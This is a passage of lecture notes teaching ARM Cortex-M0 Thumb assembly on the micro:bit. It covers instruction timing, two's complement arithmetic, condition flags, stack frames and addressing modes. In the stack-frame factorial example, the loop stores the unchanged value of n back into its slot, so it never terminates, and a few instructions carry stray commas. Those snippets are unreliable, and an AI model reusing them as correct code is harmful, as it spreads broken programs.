Apart from branch instructions, which need 3 cycles if taken and 1 if not, instructions that access memory need an extra cycle, and provide another exception to the rule that the processor executes one instruction per clock cycle. The timings of all the instructions are given in Section 3.3 of the Cortex-M0 Technical Reference Manual linked from the documentation page. These timings reveal that a model of the processor where each successive state is computed in a combinational way from the preceding state is not really accurate. In fact, the Cortex-M0 design has a small amount of pipelining, overlapping the decoding of the next instruction and the fetching of the next-but-one with the execution of the current instruction.

The progress of instructions through the pipeline is disrupted whenever a branch is taken, and it takes a couple of cycles for the pipeline to fill again. Also, load and store instructions need to use the single, shared interface to memory both when the instruction is fetched and again when it is executed, so they also add an extra cycle. Unlike more sophisticated machines, the Cortex-M0 doesn't try to guess which way a branch instruction will go in order to avoid stalling the pipeline; for many such machines with deeper pipelines, the penalty for a mis-predicted branch is high, so effective branch prediction becomes essential for performance. More details on all of this can be found in the Second Year course on Computer Architecture.

[3.5] It's quite easy to verify the timing of the loop by experiment. Things are set up so that we can do this in three different ways.

  • First, the processor has an internal counter that increment at the same rate (16MHz) as the processor clock. As you've seen, the main program uses this counter to measure the number of clock cycles taken by the assembly-language subroutine func. After compensating for the time taken to perform the subroutine call, the time is printed together with the result.
  • Second, the main program lights one of the LEDs on the micro:bit during the time that the subroutine is running. We use electronic instruments to measure the time the LED is on. One possibility is to use an inexpensive logic analyser, but that is restricted to a sample rate of 24MHz, and that's barely enough to measure a pulse length that is a multiple of 1/16 μsec. But we can time a program that takes many clock cycles and still get a fairly accurate idea of the running time. For the multiplication program, we could try calculating 100 * 123 and 200 * 123, and the difference between the two times would be the time for 100 iterations of the loop.
  • Third, it's better to use an oscilloscope that is able to sample at a higher rate.

[3.6] Here's a trace for the calculation of 123 * 5 on the V1 micro:bit, showing a pulse length of 3.33μsec.

Calculation of 123 * 5
Calculation of 123 * 5

And here's a calculation of 123 * 6. The pulses can be measured with the oscilloscope even though they are far too short for the LED to light visibly.

Calculation of 123 * 6
Calculation of 123 * 6

The difference is 0.44μsec as predicted.

We can do better than this! For one thing, we could code the function more tightly, and reduce the number of instructions executed and the number of cycles needed by the loop (see Ex. 1.3). But better still, we could use a better algorithm.

Questions

Will we need to memorise Thumb instructions for the exam?

No, the exam paper will contain a quick reference guide (published here in advance) to the commonly used instructions – and of course, you won't be expected to remember details of the uncommon ones. As you'll see, the ranges covered by immediate fields are spelled out, but there will be no questions that turn on the precise values. A question could refer to an instruction not on the chart, but only if the question itself describes the instruction.

For example, the paper might ask, "Explain why it is advantageous to allow a larger range of offsets for the load instruction ldr r0, [sp, #off] than for the form ldr r0, [r1, #off]." Or it might ask, "There is an instruction svc that directly causes an interrupt: explain why this instruction provides a better way of entering the operating system than an ordinary procedure call." There certainly won't be a question that says without further context, "Decode the instruction 0x8447." And in asking for a simple piece of assembly language, the paper won't try to trick you with snags like the fact that adds r0, r0, #10 has an encoding but adds r0, r1, #10 does not. If you write the latter instruction in place of movs r0, r1; adds r0, r0, #10 then you are unlikely to lose even a single mark.

If a subroutine expects its return address in the lr register, and one subroutine A calls another subroutine B, won't the call to B overwrite the return address of A, so that A no longer knows where to return?

Our first attempts at assembly language programming have been tiny subroutines that call no others and use only the registers r0 to r3. For them (leaf routines), we can assume the return address arrives in lr and remains there until the subroutine returns with bx lr. Calling another subroutine does indeed trash the value of lr, and that means that non-leaf routines must carefully save the lr value when they are entered, so that they can use it as a return address later. As we'll see very shortly, this is neatly done by writing something like

push {r4, r6, lr}

at the top of the subroutine, an instruction which at one fell swoop saves some registers and the lr value on the stack. Then we write a matching instruction

pop {r4, r6, pc}

at the bottom to restore the registers and load the return address into the pc, effectively returning from the subroutine. It's good that the action of saving registers on the stack is separate from the action of calling a subroutine, because it allows us to use the simpler and faster scheme for leaf routines.

Lecture 4

Lecture 4 – Number representations

Signed and unsigned numbers. Numeric comparisons.


Signed and unsigned numbers

[math]\displaystyle{ }[/math][4.1] So far we have used only positive numbers, corresponding to the C type unsigned. We can pin down the properties of this data type by defining a function \(\mathit{bin}(a)\) that maps an \(n\)-bit vector \(a\) to an integer:

\[\mathit{bin}(a) = a_0 + 2a_1 + 4a_2 + \ldots + 2^{n-1}a_{n-1} = \sum_{0\le i\lt n} a_i.2^i\]

(where \(n = 32\)). What is the binary operation \(\oplus\) that is implemented by the add instruction? It would be nice if always

\[\mathit{bin}(a \oplus b) = \mathit{bin}(a) + \mathit{bin}(b)\]

but unfortunately that's not possible owing to the limited range \(0 \le \mathit{bin}(a) < 2^n\). All we can promise is that

\[\mathit{bin}(a \oplus b) \equiv \mathit{bin}(a) + \mathit{bin}(b) \pmod{2^n}\]

and since each bit vector maps to a different integer modulo \(2^n\), this equation exactly specifies the result of \(\oplus\) in each case.

[4.2] More commonly used than the unsigned type is the type int of signed integers. Here the interpretation of bit vectors is different: we define \(\mathit{twoc}(a)\) by

\[\mathit{twoc}(a) = \sum_{0\le i<n-1} a_i.2^i - a_{n-1}.2^{n-1}.\]

Taking \(n = 8\) for a moment:

    a        bin(a)   twoc(a)
-----------------------------
0000 0000       0        0
0000 0001       1        1
0000 0010       2        2
   ...
0111 1111     127      127 = 27-1
1000 0000     128     -128 = -27
1000 0001     129     -127
   ...
1111 1110     254       -2
1111 1111     255       -1

Note that the leading bit is 1 for negative numbers. So we see \(-2^{n-1}\le \mathit{twoc}(a) < 2^{n-1}\), and

\[\mathit{twoc}(a) = \sum_{0\le i<n} a_i.2^i - a_{n-1}.2^n = \mathit{bin}(a) - a_{n-1}.2^n.\]

So \(\mathit{twoc}(a) \equiv \mathit{bin}(a) \pmod{2^n}\). Therefore if \(\mathit{bin}(a \oplus b) \equiv \mathit{bin}(a) + \mathit{bin}(b) \pmod{2^n}\), then also \(\mathit{twoc}(a \oplus b) \equiv \mathit{twoc}(a) + \mathit{twoc}(b)\), and the same addition circuit can be used for both signed and unsigned arithmetic – a telling advantage for this two's complement representation.

[4.3] How can we negate a signed integer? If we compute \(\bar a\) such that \(\bar a_i = 1 - a_i\), then we find

\[\begin{align}\mathit{twoc}(\bar a) &= \sum_{0\le i<n-1} (1-a_i).2^i - (1-a_{n-1}).2^{n-1}\\&= -\Bigl(\sum_{0\le i<n-1} a_i.2^i - a_{n-1}.2^{n-1}\Bigr) + \Bigl(\sum_{0\le i<n-1} 2^i - 2^{n-1}\Bigr) = -\mathit{twoc}(a)-1\end{align}\]

So to compute \(-a\), negate each bit, then add 1. This works for every number except \(-2^{n-1}\), which like 0 gets mapped to itself.

This gives us a way of implementing binary subtraction \(\ominus\) in such a way that

\[\mathit{twoc}(a\ominus b) \equiv \mathit{twoc}(a) - \mathit{twoc}(b) \pmod{2^n}.\]

We simply define \(a\ominus b = a\oplus \bar b\oplus 1\). If we have a method of addition that adds two digits and a carry in each column, producing a sum digit and a carry into the next column, then the natural thing to do is treat the \(+1\) as a carry input to the rightmost column. We will implement this electronically next term.

Context

This two's-complement binary representation of numbers is typical of every modern computer: the vital factor is that the same addition circuit can be used for both signed and unsigned numbers. Historical machines used different number representations: for example, in business computing most programs used to do a lot of input and output and only a bit of arithmetic, and there it was better to store numbers in decimal (or binary-coded decimal) and use special circuitry for decimal addition and subtraction, rather than go to the trouble of converting all the numbers to binary on input and back again to decimal on output, something that would require many slow multiplications and divisions. Floating point arithmetic has standardised on a sign-magnitude representation because two's-complement does not simplify things in a signficant way. That makes negating a number as simple as flipping the sign bit, but it does means that there are two representations of zero – +0 and −0 – and that can be a bit confusing.

Comparisons and condition codes

[math]\displaystyle{ }[/math][4.4] To compare two signed numbers \(a\) and \(b\), we can compute \(a \ominus b\) and look at the result:

  • If \(a \ominus b = 0\), then \(a=b\).
  • If \(a \ominus b\) is negative (sign bit = 1), then it could be that \(a<b\), or maybe \(b<0<a\) and the subtraction overflowed. For example, if \(a = 100\) and \(b = -100\), then \(a-b = 200 \equiv -56 \pmod{256}\) in 8 bits, so \(a\ominus b\) appears negative when the true result is positive.
  • Similar examples show that, with \(a < 0 < b\), the result of \(a \ominus b\) can appear positive when the true result is negative. In each case, we can detect overflow by examining the signs of \(a\) and \(b\) and seeing if they are consistent with the sign of the result \(a \ominus b\).

[4.5] The cmp instruction computes \(a \ominus b\), throws away the result, and sets four condition flags:

  • N – the sign bit of the result
  • Z – whether the result is zero
  • C – the carry output of the subtraction
  • V – overflow as explained above

[4.6] A subsequent conditional branch can test these flags and branch if an appropriate condition is satisfied. A total of 14 branch tests are implemented.

equality     signed              unsigned                  miscellaneous
--------     ------              --------                  -------------
beq*  Z      blt  N!=V           blo = bcc*  !C            bmi*  N
bne*  !Z     ble  Z or N!=V      bls         Z or !C       bpl*  !N
             bgt  !Z and N=V     bhi         !Z and C      bvs*  V
             bge  N=V            bhs = bcs*  C             bvc*  !V

The conditions marked * test individual condition code bits, and the others test meaningful combinations of bits. For example, the instruction blt tests whether in the comparison \(a<b\) was true, and that is true if either the subtraction did not overflow and the N bit is 1, or the subtraction did overflow and the N bit is 0 – in other words, if N ≠ V. All the other signed comparisons use combinations of the same ideas: it's pointless to memorise all the combinations.

For comparisons of unsigned numbers, it's useful to work out what happens to the carries when we do a subtraction. For example, in 8 bits we can perform the subtraction 32 − 9 like this, adding together 32, the bitwise complement of 9, and an extra 1:

32      0010 0000
~9      1111 0110
                1
      -----------
      1 0001 0111

The result should be 2310 = 101112, but as you can see, if performed in 9 bits there is a leading 1 bit that becomes the C flag. If we subtract unsigned numbers \(a-b\) in this way, the C flag is 1 exactly if \(a\ge b\), and this give the basis for the unsigned conditional branches bhs (= Branch if Higher or Same), etc.

The cmp instruction has the sole purpose of setting the condition codes, and throws away the result of the subtraction. But the subs instruction, which saves the result of the subtraction in a register, also sets the condition codes: that's the meaning of the s suffix on the mnemonic. (The big ARMs have both subs that does set the condition codes, and sub that doesn't.) Other instructions also set the condition codes in a well-defined way. If the codes are set at all, Z always indicates if the result is zero, and N is always equal to the sign bit of the result.

  • In an adds instruction, the C flag is set to the carry-out from the addition, and the V flag indicates if there was an overflow, with a result whose sign is inconsistent with the signs of the operands.
  • In a shift instruction like lsrs, the C flag is set to the last bit shifted out. That means we can divide the number in r0 by 2 with the instruction lsrs r0, r0, #1 and test whether the original number was even with a subsequent bcc instruction. Shift instructions don't change the V flag.

Context

The four status bits NZCV are almost universal in modern processor designs. The exception is machines like the MIPS and DEC Alpha that have no status bits, but allow the result of a comparison to be computed into a register: on the MIPS, the instruction slt r2, r3, r4 sets r2 to 1 if r3 < r4 and to zero otherwise; this can be followed by a conditional branch that is taken is r0 is non-zero.

On x86, the four flags are called SZOC, with S for sign and O for overflow, and for historical reasons there are additional flags P (giving the parity of the least-significant byte of the result) and A (used to implement BCD arithmetic). Also, the sense of the carry flag after a subtract instruction is reversed, so that it is set if there is a borrow, rather than the opposite. Consequently, the conditions for unsigned comparisons are all reversed, so that the x86 equivalent of bhs is the jae (jump if above or equal) instruction, which branches if the C flag is zero. The principles are the same, but the detailed implementation is different.

Questions

Is overflow possible in unsigned subtraction, and how can we test for it?

[math]\displaystyle{ }[/math]Overflow happens when the mathematically correct result \(\mathit{bin}(a) - \mathit{bin}(b)\) is not representable as \(bin(c)\) for any bit-vector \(c\). If \(\mathit{bin}(a) \ge \mathit{bin}(b)\) then the difference \(\mathit{bin}(a) - \mathit{bin}(b)\) is non-negative and no bigger than \(\mathit{bin}(a)\), so it is representable. It's only when \(\mathit{bin}(a) < \mathit{bin}(b)\), so the difference is negative, that the mathematically correct result is not representable. We can detect this case by looking at the carry bit: C = 0 if and only if the correct result is negative.

How can the overflow flag be computed?

Perhaps this is a question better answered next term, when we will focus on computing Boolean functions using logic gates. But let me answer it here anyway, focussing on an addition, because subtraction is the same as addition with a complemented input. The \(V\) flag should be set if the sign of the result is inconsistent with the signs of the two inputs to the addition. We can make a little truth table, denoting by \(a_{31}\) and \(b_{31}\) the sign bits of the two inputs, and by \(z_{31}\) the sign bit of the result.

\(a_{31}\) \(b_{31}\) \(z_{31}\) \(V\)
0 0 0 0 All positive
0 0 1 1 Positive overflows to negative
0 1 ? 0 Overflow impossible
1 0 ? 0 Overflow impossible
1 1 0 1 Negative overflows to positive
1 1 1 0 All negative

Various formulas can be proposed for \(V\): one possibility is \(V = (a_{31} \oplus z_{31}) \wedge (b_{31} \oplus z_{31})\), where \(\oplus\) denotes the exclusive-or operation.

There is a neater way to compute \(V\) if we have access to the carry input \(c_{31}\) and output \(c_{32}\) of the last adder stage. We can extend the truth table above, filling in \(c_{32} = {\it maj}(a_{31}, b_{31}, c_{31})\) and \(z_{31} = a_{31}\oplus b_{31}\oplus c_{31}\) as functions of the inputs to the last stage.

\(a_{31}\) \(b_{31}\) \(c_{31}\) \(c_{32}\) \(z_{31}\) \(V\)
0 0 0 0 0 0
0 0 1 0 1 1
0 1 0 0 1 0
0 1 1 1 0 0
1 0 0 0 1 0
1 0 1 1 0 0
1 1 0 1 0 1
1 1 1 1 1 0

By inspecting each row, we can see that \(V = c_{31} \oplus c_{32}\). We can derive this using the remarkable equation

\({\it maj}(a,b,c)\oplus x = {\it maj}(a\oplus x, b\oplus x, c\oplus x)\),

and the property \({\it maj}(a, b, 0) = a \wedge b\). For, subsituting for \(z_{31}\) in the previous formula for \(V\) and simplifying, we obtain

\(V = (b_{31}\oplus c_{31}) \wedge (a_{31}\oplus c_{31}) = {\it maj}(a_{31} \oplus c_{31}, b_{31}\oplus c_{31}, c_{31}\oplus c_{31}) = {\it maj}(a_{31}, b_{31}, c_{31})\oplus c_{31} = c_{32} \oplus c_{31}\).


Lecture 5

Lecture 5 – Loops and subroutines

A better multiplication algorithm. Stack frames. Recursive calculation of binomial coefficients.


A better multiplication algorithm

[5.1] Let's keep the invariant a * b = x * y + z, but try halving y in each iteration: in not-quite-C,

unsigned func(unsigned a, unsigned b) {
    unsigned x = a, y = b, z = 0;

    /* Invariant: a * b = x * y + z */
    while (y != 0) {
        if (y odd) z = z + x;
        x = x*2; y = y/2; 
    }

    return z;
}

We'll code this routine in assembly language, again keeping x, y and z in registers r0, r1 and r2. How are we going to implement the operations x = x*2 and y = y/2? The ARM provides shift instructions that (at least for positive inputs) can multiply or divide by powers of 2: the instruction

lsls r0, r0, #1

shifts the contents of r0 to the left by one place, multiplying the value by 2. (Actually, almost the same effect results from adds r0, r0, r0.) Also, the instruction

lsrs r1, r1, #1

shifts the contents of r1 one place to the right, dividing the value by 2, and throwing away any remainder. It shifts out a single bit at the right (and puts it in the C flag), and shifts in a zero at the left. These are called a logical shift because of the zero bit (or bits) that are shifted in at one end or the other; there's also an arithmetic right shift instruction that makes more sense when the bit pattern might represent a negative number.

The fact that the bit shifted out is put in the C flag allows us to implement the test x odd neatly: if we write

lsrs, r1, r1, #1
bcc even

then that divides y by 2 and branches to the label even if y was even, executing the next instruction only if y was odd. (That's not an improvement we can expect a compiler to find.)

[5.2] A final idea is to put the test y != 0 at the end of the loop, so that there is only one branch instruction in the loop itself. The unconditional branch at the start is executed only once.

func:
        movs r2, #0             @ z = 0
        b test
again:
        lsrs r1, r1, #1         @ y = y/2
        bcc even                @ if y was even, skip
        adds r2, r2, r0         @ z = z + x
even:
        lsls r0, r0, #1         @ x = x*2
test:
        cmp r1, #0              @ if y != 0
        bne again               @   repeat
        movs r0, r2             @ return z
        bx lr

There's still something not-quite-optimal about this function, because if y is non-zero and is even, then we can be sure that y>>1 is still non-zero, and yet the program still tests for zero after every step: you can investigate this in the lab. Also, we could use loop unrolling, this time with a clear idea of how much unrolling is worthwhile.

Stack frames and locals

[5.3] What if ...

  • we want to write a subroutine that calls another, or perhaps recursively calls itself? (We must save our return address.)
  • we want to use registers r4--r7? (We must restore their values before returning.)
  • we want a subroutine that accepts more than four arguments? (They won't all fit in r0 to r3.)
  • we need more local variables than will fit in registers (or maybe a local array)?

The answer is to let the subroutine use space in memory, taken from the subroutine stack, giving it a stack frame. Most subroutines will be like this, except for tiny routines that call no others. The subroutine stack is an area of memory, starting from the highest addresses in RAM and growing downwards, that is reserved for storing information that relates to each subroutine activation. If one subroutine calls others, then all the others must return before the original subroutine returns, and it is this that makes the storage behave in a stack-like manner.

Stack frame layout

We'll leave until next time the possibility of having local variables that live in the stack frame, and the load and store instructions that must be used to access them. For now, let's concentrate on the possibility that we want to use the registers r4 to r7, in addition to the registers r0 to r3 that are already available to us. Conventions obeyed by all software on the micro:bit require us to restore these registers to their original values before the subroutine returns. Also, if this subroutine calls others, then the link register lr will be overwritten by the calls, and we will need to save its value somewhere if we are to know where to return.

The subroutine will have a layout like this:

func:
    push {r4, r5, lr}     @ Save registers

    @ Use r4 and r5, call other routines

    pop {r4, r5, pc}      @ Restore and return

The push and pop instructions transfer multiple words between registers and memory, and adjust the stack pointer. The push saves whatever registers (from r4 to r7) are used in the body of the subroutine, and also moves the return address from lr into the slot in the stack frame that is marked in the diagram. It also moves the stack pointer register sp down by the size of the items saved, ensuring that when this subroutine calls another one, the other subroutine will create its stack frame below ours without overlapping. When the micro:bit comes out of reset, the stack pointer is initialised so it points to the very top of the RAM area.

The body of the subroutine can overwrite the saved registers (r4 and r5 in this case) however it likes, and also call other subroutines using a bl instruction that overwrites the lr register. Whatever values we put in these registers will be preserved in their turn by the subroutines we call, so we can use them (unlike r0 to r3) to save values across subroutine calls. Other registers (r6 and r7 in this case) that we don't use need not be mentioned by us, even if they are used by other subroutines that we call. If those subroutines use them, then they will look after saving them (with the values that we received and have not changed) and restoring them to the same values before they return, so that they will have their original values when we ourselves return.

When execution reaches the pop instruction, its action is roughly inverse to the push instruction. Provided the register lists agree, the values saved in the stack frame on entry will be restored to the same registers, and then the return address will be moved – not back into lr where it arrived, but into the program counter pc, so that execution resumes with the instruction just after the one that called this subroutine.

The push and pop instructions represent a departure from the RISC principle that each instruction should describe a single, simple operation, but they are included to make programming easier and for performance. Although a push or pop instruction is equivalent to a sequence of load or store instructions plus an add or sub instruction that adjusts sp, in fact the instruction is more compact, and faster because it only needs to be decoded once, then (on the Cortex-M0) one register can be saved on each successive clock cycle. An ordinary load or store instruction takes 2 cycles, but a push or pop takes only n+1 cycles to save or restore n registers. Each instruction contains a little bitmap to say which of the low registers r0 to r7 to save or restore, plus an additional bit saying whether to save a return address from lr or restore it to pc. Although the assembly language syntax looks more general, in fact we aren't allowed to write things like

    pop {r4, lr}     @ Wrong!

because a pop can reload pc and never lr.

Example: factorials without a multiply instruction

Let's illustrate these ideas by writing a subroutine that computes the factorial of its argument, using a subroutine to do the required multiplications. This is a contrived and perhaps too simple example, but making it simple helps us to concentrate on the mechanisms. In C, our subroutine could be written like this:

int fac(int n)
{
    int k = n, f = 1;

    while (k != 0) {
        f = mult(f, k);
        k = k-1;
    }

    return f;
}

There are two local variables, k and f. Because this subroutine calls others, we will keep both of them in variables that are preserved across subroutine calls: k in r4 and f in r5. Luckily, the argument n is not mentioned again after we have used it to initialise k, otherwise we would have to move it into another register also.

In assembly language, our subroutine can begin like this:

fac:
    push {r4, r5, lr}
    movs r4, r0             @ Initialise k to n
    movs r5, #1             @ Set f to 1

Then we are ready for the loop. For simplicity, let's keep the test at the top of the loop.

again:
    cmp r4, #0              @ Is k = 0?
    beq finish              @ If so, finished

Next comes the subroutine call f = mult(f, k): we must move the arguments, f and k into registers r0 and r1 respectively, then use bl to branch to the subroutine, and finally move the result from r0 back into r5 where f lives.

    movs r0, r5             @ Set f to f * k
    movs r1, r4
    bl mult
    movs r5, r0

The end of the loop body reduces k by one and branches back the the start.

    subs r4, r4, #1         @ Decrement k
    b again                 @ And repeat

When the loop is finished, we must move the result f into r0 before returning.

finish:
    movs r0, r5             @ Return f
    pop {r4, r5, pc}

In this program, as it happens, the subroutine mult uses only registers r0--r3, so it does not need to do anything to preserve the values that fac is keeping in r4 and r5. Those registers are saved on entry to fac, then the whole calculation happens using r4 and r5 to hold fac's variables, using r0--r3 temporarily to perform multiplications, and with no further transfers between registers and memory, until r4 and r5 are restored when fac returns.

Although the version of fac shown above is a faithful translation of the C original, it can be improved a bit if we observe that the variable f need not be preserved across the subroutine call, because the result of the call overwrites f. Because of this, there is no need to keep f in a register that is preserved across the call, and it can in fact live in r0 all the time, like this:

fac:
    push {r4, lr}
    movs r4, r0             @ Initialise k to n
    movs r0, #1             @ Set f to 1

again:
    cmp r4, #0              @ Is k = 0?
    beq finish              @ If so, finished

    movs r1, r4             @ Set f to f * k
    bl mult

    subs r4, r4, #1         @ Decrement n
    b again                 @ And repeat

finish:
    pop {r4, pc}

Optimising compilers are able to generate code like this by analyising the dataflow in the program, and assigning the same register to two quantities when one is a copy of the other. In this case, starting from the C code for fac, GCC is able to determine that the value returned by mult, the argument to the next invocation of mult, and the result that fac eventually returns can all live in r0. The code it outputs is similar to the second version of fac shown above.

Questions

What's the difference between a subroutine, a procedure and a function?

I tend to use all three terms interchangeably. I think subroutine is the most neutral term, unlikely to be confused with either an informal list of instructions (e.g., the procedure for downloading code to the micro:bit) or a mathematical operation (e.g., the sine function). The term procedure is common in thinking about Pascal-like languages, where indeed each subroutine is introduced by the keyword procedure. The corresponding term in C (and, I suppose, in functional languages) is function.

Couldn't we use a tst instruction to implement the test whether y is even?

In the lecture, I suggested using an ands instruction to mask out the bottom bit of y. After a bit of fumbling, we collectively came up with

    movs r3, #1
    ands r3, r3, r1
    beq even

It's also possible to exploit the tst instruction, which (according to the reference card) computes the bitwise and of its two inputs, uses it to set the N and Z flags, then throws the result away. It is related to the ands instruction in the same way that the cmp instruction is related to subs. Using this instruction, we can write

    movs r3, #1
    ...
    tst r1, r3
    beq even

That's the same number of instructions, but the difference is that the value in r3 is not overwritten, so we can set r3 to 1 just once outside the loop, and leave it there throughout the execution of the subroutine. Neither of these methods is quite as good as the solution we adopted, exploiting the fact that the lsrs instruction sets the C flag to the last bit shifted out.

Lecture 6

Lecture 6 – Memory and addressing

Addressing modes. Arrays. Example: Catalan numbers.

The subroutines we have written so far have kept their data in registers, occasionally using the stack to save some registers on entry and restore them on exit. In more elaborate programs, we will want to access data in memory explicitly, for several reasons.

  • Sometimes there are too many local variables to fit in registers, and we will need to allocate space in the stack frame of a subroutine to store some of them.
  • High-level programs allow global variables, declared outside any subroutine, whose value persists even when the subroutines that access them have returned, and we want the same effect in an assembly-language program.
  • Programs that handle more than a fixed amount of data must use arrays allocated in memory to store it, either global arrays allocated once and for all, or arrays that are local to a subroutine.

For all these purposes, ARM processors use load and store instructions that move data between memory and registers, with the memory transfers happening in separate instructions from any arithmetic that is done on the loaded values before storing them back to memory. This contrasts with designs like the x86, where there are instructions that (for example) fetch a value from memory and add it to a register in one go; on the ARM, fetching the value and adding to the register would be two instructions. The most frequently used load and store instructions move 4-byte quantities between registers and memory, but there are also other instructions (we'll get to them later) that move single bytes and also two-byte quantities.

The entire memory of the computer (including both RAM and ROM) is treated as an array of individual bytes, each with its own address. Quantities that are larger than a single byte occupy several contiguous bytes, most commonly four bytes corresponding to a 32-bit register, with the "little-endian" convention that the least significant byte of a multibyte quantity is stored at the smallest address. These multibyte quantities must be aligned, so that (for example) the least significant byte of a four-byte quantity is stored at an address that is a multiple of four.

Context

Computers differ in the way they treat unaligned loads and stores, that is, load and store operations for multi-byte quantities where the address is not an exact multiple of the size of object. On some architectures, such as modern ARM chips, such loads and stores are not implemented and result in a trap, and in the case of the micro:bit with our software, in the Seven Stars of Death. On such machines alignment of loads and stores is mandatory. On other machines, like the x86 family, unaligned loads and stores have traditionally been allowed, and continue to be implemented in later members of the family, though as time goes on there may be an increasing performance gap between aligned and unaligned transfers. This happens because modern hardware becomes more and more optimised for the common case, and unaligned transfers may be supported by some method such as performing two separate loads and combining the results. So on these machines too, it makes sense to align objects in memory.

Each invocation of a subroutine is associated with a block of memory on the program's stack that we call the stack frame for the invocation. The stack pointer begins at the top of memory, and as subroutine calls nest, it moves towards lower addresses, so that the stack grows downwards into an area of 2kB or more of memory that is dedicated to it. When a subroutine is entered, the initial push instruction (if any) saves some registers and decrements the stack pointer, leaving it pointing at the last value to be saved; then the subroutine may contain an explicit sub instuction that decrements the stack pointer further, reserving space for local variables whose addresses are at positive offsets from the stack pointer. The instruction set is designed to make access to these varaibles simple and efficient. The size of the local variables should be a multiple of 4 bytes, so that the stack pointer is always a multiple of 4. On larger ARM processors, there is a convention that the stack pointer should be a multiple of 8 whenever a subroutine is entered, but there is no need for this stronger convention on the Cortex-M0 processor, so we ignore it.

Other subroutines called by this one may push their own frames on the stack, but remove them before exiting, so that the stack pointer has a consistent value whenever this subroutine is running. At the end of a subroutine with local variables, the operations on the stack pointer are reversed: first we add back to the stack pointer the same quantity that was subtracted on entry, then there is a pop instruction that restores those registers that were saved on entry, also putting the return address back into the pc.

Example: factorial with local variables

Let's begin with an example: an implementation of factorial that calls a subroutine for multiplication, but instead of keeping values in the callee-save registers r4 to r7 across subroutine calls, keeps them in slots in its stack frame. As before, we will implement an assembly language equivalent to the following C subroutine.

int func(int x, int y)
{
    int n = x, f = 1;

    while (n != 0) {
        f = mult(f, n);
        n = n-1;
    }

    return f;
}

We'll keep the values of n and f in two slots in the stack frame for the subroutine:

     |  Stack frame   |
     |    of caller   |
     +================+
     |  Saved lr      |
     +----------------+
     |  Local n       |
     +----------------+
 sp: |  Local f       |
     +================+

The subroutine won't use registers r4 to r7 at all, so there's no need to save them on entry, but we do need to save lr, and we also need to adjust the stack pointer so as to allocate space for n and f.

func:
    push {lr}
    sub sp, sp, #8          @ Reserve space for n and f

Because each of the integer variables n and f occupies four bytes, we must subtract 8 from the stack pointer.

Next, we should set n and f to their initial values: n to the parameter x that arrived in r0, and f to the constant 1, which we put in a register and then store into f's slot in the stack frame.

    str r0, [sp, #4]        @ Save n in the frame
    movs r0, #1             @ Set f to 1
    str r0, [sp, #0]

The two str instructions each transfer a value from r0 to a slot in memory whose address is obtained by adding to the stack pointer sp a constant offset, 4 for n and 0 for f.

Now we come to the loop in the body of func. Whenever we want to use n or f, we must use a load instruction ldr to fetch it from the appropriate stack slot. For efficiency, we can fetch n once into r1, and then use it for both the test n != 0 and the function call mult(f, n) without fetching it again.

again:
    ldr r1, [sp, #4]        @ Fetch n
    cmp r1, #0              @ Is n = 0?
    beq finish              @ If so, finished

    ldr r0, [sp, #0]        @ Fetch f
    bl mult                 @ Compute f * old n
    str r0, [sp, #0]        @ Save as new value of f

    ldr r0, [sp, #4]        @ Fetch n again
    subs, r2, r1, #1        @ Compute n-1
    str r0, [sp, #4]        @ Save as new n

    b again                 @ Repeat

Values in r0 to r3 may be overwritten by the mult subroutine, but the values stored in the stack frame will not be affected by the subroutine, and we can implement n = n-1 by fetching n again from its slot after the subroutine call, decrementing it, and storing the result back into the same slot.

When the loop terminates, we need to fetch the final value of f into r0 so that it becomes the result of the subroutine. Then the stack pointer is adjusted back upwards to remove n and f from the stack before popping the return address.

finish:
    ldr r0, [sp, #0]        @ Return f
    add sp, sp, #8          @ Deallocate locals
    pop {pc}

It's clear that holding local variables in the stack frame is more cumbersome than saving some registers on entry to the subroutine and then using them to hold the local variables. It's only when a subroutine needs more than about four local variables that we would want to do so, and even then we would want to keep the most used four of them in registers, mixing the two techniques.

Addressing modes

For each load or store instruction, the address of the item in memory that is transferred to or from a register is obtained by a calculations that may involve the contents of other registers and also a small constant. Each way of calculating the address is called and addressing mode, and addressing on ARM processors has two main modes that we can call reg+const and reg+reg. As an example of the reg+const adressing mode, the instruction

ldr r0, [r1, #20]

takes the value occupying register r1 and adds the constant 20 to it to form an address (which must be a multiple of four). It fetches the 4-byte quantity from this address and loads it into register r0. In a typical use of this instruction, r1 contains the address of a multi-word object in memory (such as an array), and the constant 20 contains the offset from there to a particular word in the object. There is a matching instruction

str r0, [r1, #20]

where the address is calculated in the same way, but the value in r0 is stored into the memory location at that address. Also provided is the reg+reg addressing mode, with typical syntax

ldr r0, [r1, r2]

or

str r0, [r1, r2]

where the offset part of the address is obtained from a register: the two named registers are added together to obtain the address (again a multiple of 4) for loading or storing the value in r0.

In native ARM code, these two forms can be used with any registers, and some other possibilities are provided. When forming an address by adding two registers, it's possible to scale one of the registers by a power of two by shifting it left some number of bits, giving an addressing mode that we can describe as reg+reg<<scale, with the assembly language syntax

ldr r0, [r1, r2, LSL #2]     @ Native code only!

This form is particularly useful when the register shown here as r1 contains the base address of an array, and r2 contains an index into the array, because as we'll see later, the index of an array must be multiplied by the size of each element to find the address of a particular element. In Thumb code, we will have to do the scaling in a separate instruction. Native ARM code also provides other, less frequently used addressing modes that are unsupported in Thumb code and needn't be described here.

In Thumb code, the options provided are the two forms shown above, where the registers shown as r0, r1 and r2 may be replaced by any of the low registers r0 to r7. In addition, three special-purpose instruction encodings are provided that use the stack pointer register sp or the program counter pc as a base register with the addition of a constant. The two instructions with syntax

ldr r0, [sp, #20]

and

str r0, [sp, #20]

provide access to local variables stored in the stack frame of the current procedure, addressed at fixed offsets from the stack pointer. Also, the form

ldr r0, [pc, #40]

loads a word that is located at a fixed offset from the current pc value: this is a mechanism for access to a table of large constants that is placed in ROM next to the subroutine that uses the constants. In the Thumb encoding, the constants allowed in the forms ldr r0, [r1, #const] and ldr r0, [sp, #const] and ldr r0, [pc, #const] are subject to different ranges that are listed in the architecture manual: suffice it to say that the ranges are large enough for most instructions we will want to write.

Global variables

As well as local variables declared inside a function, C also allows global or static varaibles declared outside any function. These are accessible from any function in the same file (for static variables) or in the whole program (for global variables), and importantly they continue to exist even when the functions that access them are not being invoked. Here's a tiny example:

int count = 0;

void increment(int n)
{
    count = count + n;
}

(Note that the body of increment can be abbreviated to count += n; but any decent C compiler will produce the same code whichever way the function is written.)

How can we implement the same function in assembly language? The answer is a complicated story that is best told backwards. In the program as it runs, the global variable count will have a fixed location in RAM: let's suppose that location is 0x20000234. If that address is already in register r1 and n is in r0, then we can achieve the effect of count = count + n in three instructions: fetch the current value of count, add n to it, and store the result back into count.

    ldr r2, [r1]
    adds r2, r2, r0
